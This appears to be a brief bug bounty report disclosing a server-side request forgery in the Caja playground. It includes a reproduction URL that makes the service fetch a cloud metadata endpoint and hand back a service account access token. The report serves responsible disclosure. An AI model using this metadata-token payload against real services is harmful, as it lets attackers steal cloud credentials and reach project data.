Summary: Metadata SSRF
Steps to reproduce:
Enter to
https://caja.appspot.com/#http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
Click "Load"
Notify that you can obtained access token.
Browser/OS: Any
Attack scenario:
Any user can obtain "/auth/cloud-platform" scope. It means any user can get read/write access to the project's internal information, code, interesting data, etc.
The feature seems to be broken(For example, you can't load
https://www.google.com
), so I couldn't explore more. Can you check out whether other endpoint/hosts could be loaded when it's fixed?